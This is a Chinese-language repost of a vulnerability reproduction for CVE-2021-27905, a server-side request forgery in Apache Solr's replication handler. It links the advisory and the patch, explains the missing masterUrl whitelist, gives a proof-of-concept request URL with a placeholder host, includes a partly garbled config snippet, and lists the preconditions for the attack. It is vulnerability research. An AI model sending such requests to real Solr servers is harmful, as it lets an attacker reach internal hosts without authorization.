快速导航
网易首页 > 网易号 > 正文 申请入驻

CVE-2021-27905 Apache Solr SSRF 复现

2021-04-16 10:53:29 来源: 安全客  举报
0
分享至

漏洞分析

https://github.com/apache/solr-site/blob/eb060a0d2cf1d31de403665407fff7a0255578ec/content/solr/security/2021-04-12-cve-2021-27905.md

相应的补丁:
https://github.com/apache/solr/pull/47/files/c12bbae4da0719435cf5e19623f6dad83f0c8c65#diff-838f63a8d7b764661b66c758c19cfe6f3d6454b328a1b5f52f75480530b0cfe7

根据补丁以及漏洞描述可以确定 bug 出在当进行 replication 操作时对传入的 masterUrl 参数 Solr 未对其做白名单过滤导致,补丁则是增加了对该参数的过滤。

构造PoC过程中主要参考文档:
https://solr.apache.org/guide/6_6/index-replication.html

这里基本已经说明什么情况下才需要传masterUrl了

然后根据command=fetchindex和masterUrl就可以得到PoC的格式

http://127.0.0.1:8983/solr/db/replication?command=fetchindex&masterUrl=http://xxx

紧急分析出PoC后又看了下这里的功能是在干嘛,solr 支持配置两个core,分别是主(master)和从(slave),我们可以主动控制让从(slave)去获取主的备份,而master的地址在配置文件可以配置,也允许请求者指定。

根据文档要复现这个漏洞需要将本地的Solr作为slave,默认solr就有多个core,这里选定任意一个db

根据路径修改它的solrconfig.xml(配置文件),添加如下代码:

http://localhost/solr/dbstr> 00:00:20str> lst> requestHandler>

因为PoC 会传入masterUrl,所以这里masterUrl就随便写的。PoC:

http://127.0.0.1:8983/solr/db/replication\?command=fetchindex\&masterUrl=http://xxxx:9999

复现结果:

限制

所以这个漏洞的限制条件也就显而易见了:
1、Solr 必须配置主从模式
2、受影响的是从(slave)服务器

特别声明:以上内容(如有图片或视频亦包括在内)为自媒体平台“网易号”用户上传并发布,本平台仅提供信息存储服务。

Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

相关推荐
热点推荐
网传80%的高校教师陷入最无奈的困境,没空做学术…

网传80%的高校教师陷入最无奈的困境,没空做学术…

慧翔百科
2026-06-23 11:34:37
SpaceX坐拥1008亿美元现金储备,却借了

SpaceX坐拥1008亿美元现金储备,却借了

黄先生斜杠青年
2026-06-23 20:06:34
曼城准备报价1.4亿欧元,英超转会纪录或将被刷新

曼城准备报价1.4亿欧元,英超转会纪录或将被刷新

林间小温柔
2026-06-23 01:06:15
四国集体抗议中国地图,嘴上百般阻拦,为何不敢直面我方军队

四国集体抗议中国地图,嘴上百般阻拦,为何不敢直面我方军队

感恩每一刻
2026-06-24 04:55:48
世界杯大冷门!英格兰0-0不胜加纳,19次射门0进球,凯恩错失绝杀

世界杯大冷门!英格兰0-0不胜加纳,19次射门0进球,凯恩错失绝杀

体育知多少
2026-06-24 06:34:57
再现离谱签约!4年2.12亿续约特雷杨,奇才再度葬送重建未来!

再现离谱签约!4年2.12亿续约特雷杨,奇才再度葬送重建未来!

田先生篮球
2026-06-23 08:47:08
被王楠打败后,她38岁嫁普通人产下一子,如今在南通大学当副院长

被王楠打败后,她38岁嫁普通人产下一子,如今在南通大学当副院长

胡一舸南游y
2026-06-23 17:37:28
今晚NBA选秀,这位大卫·李不是全明星

今晚NBA选秀,这位大卫·李不是全明星

林间小温柔
2026-06-24 01:14:55
“顺德渔村”避雨事件反转,宝妈带1岁多孩子图方便不想挪电动车

“顺德渔村”避雨事件反转,宝妈带1岁多孩子图方便不想挪电动车

九方鱼论
2026-06-23 07:02:35
全球排名更新!浙江大学,世界第一

全球排名更新!浙江大学,世界第一

EOL教育在线
2026-06-22 17:56:40
葡萄牙5-0大胜,41岁C罗半场梅开二度创造历史,对镜头大喊:我回来了!凯恩空门不进,英格兰0-0闷平加纳

葡萄牙5-0大胜,41岁C罗半场梅开二度创造历史,对镜头大喊:我回来了!凯恩空门不进,英格兰0-0闷平加纳

每日经济新闻
2026-06-24 07:35:14
瞎打!运球17秒,媒体人怒批:他一人干废王俊杰、杨瀚森和徐昕

瞎打!运球17秒,媒体人怒批:他一人干废王俊杰、杨瀚森和徐昕

南海浪花
2026-06-24 06:54:30
国民党民代示警李四川:苏贞昌家族基层跑很勤,绝对不能轻忽大意

国民党民代示警李四川:苏贞昌家族基层跑很勤,绝对不能轻忽大意

海峡导报社
2026-06-23 07:12:19
这7种蔬菜千万别现吃现买!冻一冻更嫩更香,放一年,越冻越好吃

这7种蔬菜千万别现吃现买!冻一冻更嫩更香,放一年,越冻越好吃

阿龙美食记
2026-06-21 13:49:37
《一九四二》豆瓣评分从6.1上涨至8.3,冯小刚回应

《一九四二》豆瓣评分从6.1上涨至8.3,冯小刚回应

大象新闻
2026-06-23 07:13:04
网曝印度阿三在西安金龙峡景区搞起了烧烤,安全隐患很大,太过分

网曝印度阿三在西安金龙峡景区搞起了烧烤,安全隐患很大,太过分

小徐讲八卦
2026-06-23 09:45:48
给跪了,三狮变“三喵”?凯恩小禁区空门打飞,英格兰闷平……

给跪了,三狮变“三喵”?凯恩小禁区空门打飞,英格兰闷平……

五星体育
2026-06-24 06:13:42
为什么失业严重,社会却安静的可怕,没有乱起来?答案扎心又现实

为什么失业严重,社会却安静的可怕,没有乱起来?答案扎心又现实

王姐懒人家常菜
2026-06-04 13:00:46
全球第一!又一巨头企业落户龙华

全球第一!又一巨头企业落户龙华

说故事的阿袭
2026-06-24 00:17:01
超强台风“米克拉”逼近!高温+雷雨,广州将要“下开水”...

超强台风“米克拉”逼近!高温+雷雨,广州将要“下开水”...

羊城攻略
2026-06-24 01:48:17
2026-06-24 08:12:49
安全客 incentive-icons
安全客
有思想的安全新媒体
1360文章数 4754关注度
往期回顾 全部

科技要闻

国产超算时隔九年再度登顶全球

头条要闻

内塔尼亚胡:执政30年 没服过任何一个美国总统

头条要闻

内塔尼亚胡:执政30年 没服过任何一个美国总统

体育要闻

扬尼斯去了迈阿密:凯尔特人怎么办?

娱乐要闻

内娱95后顶流格局发生潜移默化的变化

财经要闻

AI“算力稀缺”信仰开始动摇?

汽车要闻

施鹏泽:为什么奥迪E7X强调座舱气味安全?

态度原创

家居
房产
艺术
健康
数码

家居要闻

绿意盎然 自然之境

房产要闻

洞察新局|预算不变 居住升级 2026广州置业成本观察

艺术要闻

何红舟 2026年5月人物写生新作

同样是中风,急救方向竟完全相反?

数码要闻

AOC发布AGON PRO AGP277QKDC双模游戏显示器
© 1997-2026 网易公司版权所有 About NetEase | 公司简介 | 联系方法 | 招聘信息 | 客户服务 | 隐私政策 | 不良信息举报 Complaint Center | 廉正举报 | 侵权投诉
无障碍浏览 进入关怀版